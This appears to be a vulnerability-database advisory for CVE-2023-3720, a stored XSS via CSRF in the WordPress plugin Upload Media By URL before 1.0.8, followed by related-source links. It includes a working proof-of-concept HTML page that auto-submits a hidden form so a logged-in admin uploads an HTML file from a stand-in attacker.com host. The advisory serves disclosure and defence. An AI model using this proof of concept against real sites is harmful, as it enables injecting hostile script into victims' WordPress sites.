Lucene search
DmitriyWPEX-ID:16375A7F-0A9F-4961-8510-D047FFBF3954HistoryAug 02, 2023 - 12:00 a.m.
Upload Media By URL < 1.0.8 - Stored XSS via CSRF
2023-08-0200:00:00
Dmitriy
58
stored xss
cross-site request forgery
unfiltered html
html file upload
example.com
attacker.com
EPSS
0.001
Percentile
30.6%
Description The plugin does not have CSRF check when uploading files, which could allow attackers to make logged in admins upload files (including HTML containing JS code for users with the unfiltered_html capability) on their behalf.
Have a logged in user with the unfiltered_html capability open an HTML file containing the following (this will make them upload the xss.html file):
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/wp-admin/upload.php" method="POST">
<input type="hidden" name="multiurl" value="https://attacker.com/xss.html" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>Related
cve
cve
CVE-2023-3720
2023-08-30 15:15:09
cvelist
cvelist
CVE-2023-3720 Upload Media By URL < 1.0.8 - Stored XSS via CSRF
2023-08-30 14:22:00
wpvulndb
wpvulndb
Upload Media By URL < 1.0.8 - Stored XSS via CSRF
2023-08-02 00:00:00
prion
prion
Cross site request forgery (csrf)
2023-08-30 15:15:00
nvd
nvd
CVE-2023-3720
2023-08-30 15:15:09
wordfence
wordfence